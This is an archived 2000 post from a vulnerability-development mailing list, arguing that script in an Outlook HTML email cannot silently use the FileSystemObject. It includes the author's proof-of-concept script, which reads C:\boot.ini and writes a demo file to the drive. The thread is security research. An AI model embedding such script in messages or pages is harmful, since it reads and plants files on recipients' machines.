Vulnerability Development mailing list archives
Re: Outlook/HTML "proggie"
From: mrousseau () LABCAL COM (Maxime Rousseau)
Date: Thu, 1 Jun 2000 11:07:52 -0400
I have tested this a little bit here and I have not been able to use the FSO within an HTML message, unless the user explicitly clicks YES at the prompt for unsafe activex or has his security set to allow unsafe activex in html emails. Thats not so by default and if your 'CAN' involves the user clicking the YES box, then its not all that great, you might as well have a vbscript file attatched. My point was (and still is) you cant use a FSO in an html eMail in a transparent-to-user manner, sorry if i was unclear. I used the following code in the html message and couldnt get it to run transparently: <script> var fso, bFile, nFile; fso = new ActiveXObject("Scripting.FileSystemObject"); bFile = fso.OpenTextFile("C:\\boot.ini",1,0); document.write(bFile.ReadAll()); nFile = fso.GetFolder("C:\\").CreateTextFile("spoitdemo.txt"); nFile.Write("Hello, This text file was written by an eMail, it could very well have been a virus!"); nFile.Close(); bFile.Close(); </script> If you are able to do it, then by all means please send a sample! If you get the "unsafe activex" box, then nevermind, this isnt usefull very much. M. PS: Anyone has details on what was used in the herald's "hell virus" story? as in, what objects? ! -----Original Message----- ! From: VULN-DEV ( Shelagh Pepper ) ! Sent: Thursday, June 01, 2000 9:00 AM ! To: VULN-DEV () SECURITYFOCUS COM ! Subject: Re: Outlook/HTML "proggie" ! ! A script within the body of an email CAN access the ! FileSystemObject if the ! Scripting host is available. I will send a sample ! separately. Most of the ! code in my sample is directly lifted from the Microsoft ! Scripting samples ! on their website. ! ! Shelagh
Current thread:
- Re: Outlook/HTML "proggie" Shelagh Pepper (Jun 01)
- <Possible follow-ups>
- Re: Outlook/HTML "proggie" Maxime Rousseau (Jun 01)
- Re: Outlook/HTML "proggie" Shelagh Pepper (Jun 02)
- Re: Outlook/HTML "proggie" methodman (Jun 01)
- Possible problem with NT Domains Leigh Watson (Jun 02)
- Re: Outlook/HTML "proggie" Eric Chien (Jun 02)
- Re: Outlook/HTML "proggie" James Turner (Jun 02)
- MSProxy Server 2 Logic Bug (Jun 02)
- Re: Outlook/HTML "proggie" Walter Williams (Jun 02)
- AW: Outlook/HTML "proggie" Joerg Weber (Jun 02)
- Re: Outlook/HTML "proggie" Maxime Rousseau (Jun 02)
- Re: Outlook/HTML "proggie" Dan Schrader (Jun 05)